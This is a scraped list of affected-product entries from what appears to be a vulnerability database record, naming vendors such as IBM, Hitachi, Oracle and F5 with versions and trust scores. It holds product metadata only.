vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.35

Trust: 0.3

vendor:hitachimodel:tuning manager software (solaris(x6scope:eqversion:7.6.1-05

Trust: 0.3

vendor:ibmmodel:tivoli composite application manager for webspherescope:eqversion:6.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:6.4.0-08

Trust: 0.3

vendor:ibmmodel:ds8870scope:eqversion:7.3

Trust: 0.3

vendor:hitachimodel:raplication manager software (linux(susescope:eqversion:8.0.0-00

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:7.001

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.5.5

Trust: 0.3

vendor:ibmmodel:qradar siem mr5scope:eqversion:7.0

Trust: 0.3

vendor:oraclemodel:communications webrtc session controllerscope:eqversion:7.0

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.3

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.07

Trust: 0.3

vendor:ibmmodel:infosphere identity insightscope:eqversion:8.0

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:8.0.0.3

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:8.3

Trust: 0.3

vendor:oraclemodel:retail allocationscope:eqversion:10.0

Trust: 0.3

vendor:ibmmodel:infosphere master data management collaborative editionscope:eqversion:-10.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.1.1-00

Trust: 0.3

vendor:ibmmodel:qradar siem mr2scope:eqversion:7.2

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(spscope:eqversion:6.4.0-08

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:neversion:8.0.0-06

Trust: 0.3

vendor:ibmmodel:business process manager expressscope:eqversion:8.5.5

Trust: 0.3

vendor:ibmmodel:endpoint manager for remote controlscope:eqversion:9.1.0

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.39

Trust: 0.3

vendor:vmwaremodel:vcenter serverscope:eqversion:5.0

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.1.0-00

Trust: 0.3

vendor:ibmmodel:predictive insightscope:eqversion:7.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.4

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.23

Trust: 0.3

vendor:ibmmodel:social media analyticsscope:eqversion:1.2

Trust: 0.3

vendor:hitachimodel:device manager software (linux(slesscope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:tivoli integrated portalscope:eqversion:2.2

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.2

Trust: 0.3

vendor:ibmmodel:tivoli workload scheduler distributedscope:eqversion:8.4

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:8.5

Trust: 0.3

vendor:hitachimodel:global link manager software (linux(rhelscope:eqversion:7.6.1-01

Trust: 0.3

vendor:oraclemodel:retail allocationscope:eqversion:13.2

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.15

Trust: 0.3

vendor:hitachimodel:device manager software )scope:eqversion:6.1.1-03

Trust: 0.3

vendor:ibmmodel:tivoli workload scheduler z/os connectorscope:eqversion:8.5.1

Trust: 0.3

vendor:ibmmodel:application manager for smart businessscope:eqversion:1.2.1

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.31

Trust: 0.3

vendor:oraclemodel:jdeveloperscope:eqversion:10.1.3.5.0

Trust: 0.3

vendor:ibmmodel:lotus expeditorscope:eqversion:6.2.3

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.1

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:neversion:8.0.0-06

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00-08

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:6.0

Trust: 0.3

vendor:oraclemodel:retail returns managementscope:eqversion:14.0

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-11-01

Trust: 0.3

vendor:ibmmodel:business process manager standardscope:eqversion:8.5.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.0

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.2.0.3.0

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.1.1-03(x64))

Trust: 0.3

vendor:oraclemodel:retail back office 12.0.9inscope: - version: -

Trust: 0.3

vendor:hitachimodel:device manager software )scope:eqversion:6.0-00

Trust: 0.3

vendor:ibmmodel:tivoli netcool configuration managerscope:eqversion:6.4

Trust: 0.3

vendor:oraclemodel:real-time decision platformscope:eqversion:3.0

Trust: 0.3

vendor:ibmmodel:filenet content manager content enginescope:eqversion:5.2.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.2

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-10

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00-07

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(slesscope:eqversion:7.1.0-00

Trust: 0.3

vendor:redhatmodel:network satellite server (for rhelscope:eqversion:6)5.5

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.31

Trust: 0.3

vendor:ibmmodel:filenet p8 platform content search enginescope:eqversion:4.5.1

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.05

Trust: 0.3

vendor:ibmmodel:infosphere master data management collaborative editionscope:eqversion:-11.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.55

Trust: 0.3

vendor:ibmmodel:tivoli netcool configuration managerscope:eqversion:6.3

Trust: 0.3

vendor:ibmmodel:security qradarscope:eqversion:7.2.2

Trust: 0.3

vendor:ibmmodel:tivoli foundations for application managerscope:eqversion:1.2

Trust: 0.3

vendor:ibmmodel:infosphere master data management server for product informationscope:eqversion:9.1

Trust: 0.3

vendor:oraclemodel:retail returns managementscope:eqversion:13.1

Trust: 0.3

vendor:ibmmodel:infosphere information serverscope:eqversion:8.0

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.5.0.0

Trust: 0.3

vendor:oraclemodel:identity managerscope:eqversion:11.1.1.5

Trust: 0.3

vendor:oraclemodel:wavesetscope:eqversion:8.1.1

Trust: 0.3

vendor:ibmmodel:tivoli identity managerscope:eqversion:5.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.0

Trust: 0.3

vendor:redhatmodel:network satellite server (for rhelscope:eqversion:6)5.4

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-11

Trust: 0.3

vendor:oraclemodel:jdeveloperscope:eqversion:11.1.24.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:tivoli netcool configuration managerscope:eqversion:6.2

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-00-11

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1.1.4

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:neversion:8.0.0-06

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.402

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.2.1-00

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.2.1-01

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:7.0.1-02

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.2.00

Trust: 0.3

vendor:junipermodel:secure analytics 2012.1r7scope:neversion: -

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.4.0-03

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.1-00

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(opscope:eqversion:7.4.0-00

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1.1.2

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:12.0

Trust: 0.3

vendor:oraclemodel:insurance ifrs analyzerscope:eqversion:178.0.7

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:56001

Trust: 0.3

vendor:ibmmodel:financial transaction managerscope:eqversion:2.1

Trust: 0.3

vendor:ibmmodel:tivoli storage manager administration centerscope:eqversion:6.2

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.0.11

Trust: 0.3

vendor:oraclemodel:retail markdown optimizationscope:eqversion:13.1

Trust: 0.3

vendor:junipermodel:secure analyticsscope:eqversion:2013.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.1

Trust: 0.3

vendor:ibmmodel:websphere lombardi editionscope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:8.2

Trust: 0.3

vendor:ibmmodel:infosphere balanced warehouse c4000scope: - version: -

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.1-00(x64))

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.33

Trust: 0.3

vendor:oraclemodel:fusion middlewarescope:eqversion:11.1.17.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.03

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.24

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.0.5

Trust: 0.3

vendor:ibmmodel:websphere partner gateway express editionscope:eqversion:6.0.0.3

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(slesscope:eqversion:7.0.1-02

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:13.4

Trust: 0.3

vendor:oraclemodel:retail markdown optimizationscope:eqversion:13.0

Trust: 0.3

vendor:ntt datamodel:terasoluna server framework for javascope:eqversion:2.0.51

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.3

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:9.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(slesscope:eqversion:6.4.0-08

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:4.2.2.177

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.45

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.01

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.2.1

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.0.0.0

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(susescope:neversion:8.0.0-06

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.1.0.1.0

Trust: 0.3

vendor:oraclemodel:communications metasolv solutionscope:eqversion:6.2.10.0

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:8.0

Trust: 0.3

vendor:ibmmodel:filenet p8 platform content search enginescope:eqversion:5.0

Trust: 0.3

vendor:hitachimodel:raplication manager software (linux(rhelscope:eqversion:8.0.0-00

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:6.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5

Trust: 0.3

vendor:oraclemodel:retail returns managementscope:eqversion:2.0

Trust: 0.3

vendor:f5model:big-ip edge gateway hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:13.2

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.06

Trust: 0.3

vendor:liferaymodel:portalscope:eqversion:6.2.1

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.02

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.1

Trust: 0.3

vendor:ibmmodel:business process manager standardscope:eqversion:7.5.0

Trust: 0.3

vendor:hpmodel:xp7 global link manager softwarescope:eqversion:7.6.0-02

Trust: 0.3

vendor:junipermodel:secure analytics 2014.2r2scope:neversion: -

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.01

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.09

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:1.0.21

Trust: 0.3

vendor:hitachimodel:raplication manager software (linux(susescope:neversion:8.0.0-06

Trust: 0.3

vendor:ibmmodel:tivoli integrated portalscope:eqversion:1.1.115

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:14.1

Trust: 0.3

vendor:ibmmodel:tivoli application dependency discovery managerscope:eqversion:7.2.2

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:7.1.0-00

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.19

Trust: 0.3

vendor:liferaymodel:portal 6.2.1-ce-ga2-securitscope: - version: -

Trust: 0.3

vendor:ibmmodel:tivoli dynamic workload consolescope:eqversion:8.5.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(slesscope:eqversion:6.3.0-00

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:8.2

Trust: 0.3

vendor:f5model:big-ip edge gateway hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:oraclemodel:fusion middlewarescope:eqversion:11.1.21.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.0

Trust: 0.3

vendor:apachemodel:strutsscope:neversion:2.3.16.2

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0.0.25

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:8.4

Trust: 0.3

vendor:ibmmodel:leadsscope:eqversion:9.1

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(spscope:eqversion:7.1.0-00

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.3.0.2.0

Trust: 0.3

vendor:ibmmodel:infosphere balanced warehouse d5100scope: - version: -

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:7.6.1-05

Trust: 0.3

vendor:junipermodel:security threat response manager 2013.2r8scope:neversion: -

Trust: 0.3

vendor:ibmmodel:tivoli system automation application managerscope:eqversion:3.2

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.3

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.08

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:15.2

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:6.401

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:8.0.0

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1.1.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.0.0-00

Trust: 0.3

vendor:ibmmodel:business process manager expressscope:eqversion:8.5.0

Trust: 0.3

vendor:hitachimodel:device manager software )scope:eqversion:7.0-00

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(spscope:eqversion:7.6.1-05

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.3

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:8.6

Trust: 0.3

vendor:oraclemodel:knowledgescope:eqversion:8.6.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(spscope:eqversion:7.0.0-00

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.2

Trust: 0.3

vendor:mandrakesoftmodel:enterprise server x86 64scope:eqversion:5

Trust: 0.3

vendor:hitachimodel:raplication manager software (solaris(x6scope:eqversion:7.6.1-05

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:3.0.1.0

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:8.0

Trust: 0.3

vendor:ibmmodel:tivoli storage managerscope:eqversion:6.3.0

Trust: 0.3

vendor:ibmmodel:security siteprotector systemscope:eqversion:3.0

Trust: 0.3

vendor:ibmmodel:infosphere mashuphubscope:eqversion:2.0

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:6.2-01

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.04

Trust: 0.3

vendor:hpmodel:device managerscope:eqversion:8.0.0-00

Trust: 0.3

vendor:hitachimodel:raplication manager softwarescope:eqversion:7.6.1-05

Trust: 0.3

vendor:hitachimodel:global link manager software (solaris(x6scope:eqversion:7.6.1-01

Trust: 0.3

vendor:ibmmodel:tivoli storage managerscope:eqversion:6.2

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.3-00

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-11-07

Trust: 0.3

vendor:f5model:big-ip edge gateway hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:ibmmodel:security siteprotector systemscope:eqversion:3.1

Trust: 0.3

vendor:hpmodel:device managerscope:eqversion:8.0.0-06

Trust: 0.3

vendor:vmwaremodel:vcenter serverscope:eqversion:5.5

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:8.01

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.2.1.0

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:tivoli endpoint manager for remote controlscope:eqversion:9.0

Trust: 0.3

vendor:oraclemodel:identity managerscope:eqversion:11.1.22

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:5

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.5.0-02

Trust: 0.3

vendor:oraclemodel:weblogic portalscope:eqversion:10.3.6.0

Trust: 0.3

vendor:oraclemodel:retail clearance optimization enginescope:eqversion:14.0

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:4.2.0

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:8.2

Trust: 0.3

vendor:hpmodel:sitescope monitors 11.32ip1scope: - version: -

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.0.1.1

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.1.13

Trust: 0.3

vendor:mandrakesoftmodel:enterprise serverscope:eqversion:5

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:neversion:8.0.0-06

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.11

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:websphere service registry and repositoryscope:eqversion:6.3

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(rhelscope:eqversion:7.6.1-05

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.2.1.2

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.22

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.1

Trust: 0.3

vendor:mandrivamodel:business serverscope:eqversion:1x8664

Trust: 0.3

vendor:ibmmodel:infosphere balanced warehouse c3000scope: - version: -

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:8.0.0-05

Trust: 0.3

vendor:ibmmodel:tivoli netcool configuration managerscope:eqversion:6.4.1

Trust: 0.3

vendor:ibmmodel:tivoli system automation application managerscope:eqversion:3.1

Trust: 0.3

vendor:oraclemodel:jdeveloperscope:eqversion:11.1.17.0

Trust: 0.3

vendor:ibmmodel:cognos business intelligencescope:eqversion:10.1.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(slesscope:eqversion:7.0.0-00

Trust: 0.3

vendor:ibmmodel:tivoli composite application manager for application diagnosticsscope:eqversion:7.1

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:14.0

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:13.4

Trust: 0.3

vendor:ibmmodel:websphere service registry and repositoryscope:eqversion:6.2

Trust: 0.3

vendor:oraclemodel:retail returns managementscope:eqversion:13.3

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.1.12

Trust: 0.3

vendor:ibmmodel:contact optimizationscope:eqversion:8.0

Trust: 0.3

vendor:hitachimodel:device manager software (linux(susescope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.1.11

Trust: 0.3

vendor:oraclemodel:retail markdown optimizationscope:eqversion:12.0

Trust: 0.3

vendor:hpmodel:xp p9000 tiered storage managerscope:eqversion:7.6.1-06

Trust: 0.3

vendor:ibmmodel:content analytics with enterprise searchscope:eqversion:3.0

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.3-00

Trust: 0.3

vendor:hpmodel:icewall configuration managerscope:eqversion:3.0

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:8.02

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.1.1

Trust: 0.3

vendor:oraclemodel:enterprise data qualityscope:eqversion:9.0.11

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:16.1

Trust: 0.3

vendor:ibmmodel:tivoli netcool/omnibus web guiscope:eqversion:7.3.1

Trust: 0.3

vendor:hitachimodel:device manager software (linux(slesscope:eqversion:7.0.1-02

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(susescope:neversion:8.0.0-06

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:6.2-01

Trust: 0.3

vendor:hpmodel:xp7 global link manager softwarescope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:business process manager expressscope:eqversion:7.5.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:8.5.5

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.51

Trust: 0.3

vendor:oraclemodel:identity managerscope:eqversion:11.1.1.7

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(susescope:eqversion:8.0.0-05

Trust: 0.3

vendor:hitachimodel:tiered storage manager software -00scope:eqversion:7.1.1

Trust: 0.3

vendor:oraclemodel:weblogic portalscope:eqversion:10.2.1.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(spscope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:tivoli integrated portalscope:eqversion:1.1

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.1-03(x64))

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:20500

Trust: 0.3

vendor:ibmmodel:websphere service registry and repositoryscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:records managerscope:eqversion:8.4

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:8.0.0-00

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:13.0

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:8.5.0.1

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-00-03

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.1

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(rhelscope:neversion:8.0.0-06

Trust: 0.3

vendor:ibmmodel:tivoli storage manager administration centerscope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:tivoli workload scheduler distributedscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.2

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.0-00(x64))

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:6.1-01

Trust: 0.3

vendor:ibmmodel:websphere service registry and repositoryscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:cognos business intelligencescope:eqversion:10.2.1

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.1

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:7.5.1.2

Trust: 0.3

vendor:ibmmodel:websphere enterprise service busscope:eqversion:6.2

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.5.0.2

Trust: 0.3

vendor:ibmmodel:infosphere master data management collaborative editionscope:eqversion:-10.1

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.2.0.2.0

Trust: 0.3

vendor:hpmodel:xp p9000 replication managerscope:eqversion:8.0.0-00

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:12.1

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.5.0.3

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:3.0.1.1

Trust: 0.3

vendor:ibmmodel:tivoli workload scheduler distributedscope:eqversion:8.6

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:8.0.1.2

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1.1

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:0

Trust: 0.3

vendor:hpmodel:xp p9000 replication managerscope:eqversion:8.0.0-06

Trust: 0.3

vendor:ibmmodel:omnifind enterprise editionscope:eqversion:9.1

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.10

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.0

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:57100

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:ibmmodel:tivoli integrated portalscope:eqversion:1.1.114

Trust: 0.3

vendor:ibmmodel:cognos business intelligencescope:eqversion:8.4.1

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:8.0.1.1

Trust: 0.3

vendor:ibmmodel:cognos business intelligencescope:eqversion:10.1

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:6.1-00

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.3

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.5.0-02

Trust: 0.3

vendor:ibmmodel:openpages grc platformscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:tivoli system automation application managerscope:eqversion:3.2.1

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-10-03

Trust: 0.3

vendor:ibmmodel:cognos business intelligencescope:eqversion:10.2

Trust: 0.3

vendor:ibmmodel:security identity managerscope:eqversion:6.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.5

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.2-00

Trust: 0.3

vendor:hitachimodel:device manager software (linux(susescope:eqversion:7.6.1-05

Trust: 0.3

vendor:ibmmodel:security qradarscope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:7.5

Trust: 0.3

vendor:hpmodel:sitescope monitorsscope:eqversion:11.20

Trust: 0.3

vendor:junipermodel:secure analyticsscope:eqversion:2012.1

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:8.5.5

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:rational insightscope:eqversion:1.0.1

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:13.2

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:6.0

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.52

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(slesscope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-00-02

Trust: 0.3

vendor:ibmmodel:content manager records enablerscope:eqversion:8.4

Trust: 0.3

vendor:oraclemodel:retail invoice matching 12.0inscope: - version: -

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.0.4

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.5.1

Trust: 0.3

vendor:oraclemodel:knowledgescope:eqversion:8.5.1

Trust: 0.3

vendor:ibmmodel:infosphere master data management server for product informationscope:eqversion:9.0

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.1-02(x64))

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.6

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:9.0.1

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.2.1.1

Trust: 0.3

vendor:oraclemodel:retail back officescope:eqversion:14.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.1.0-00

Trust: 0.3

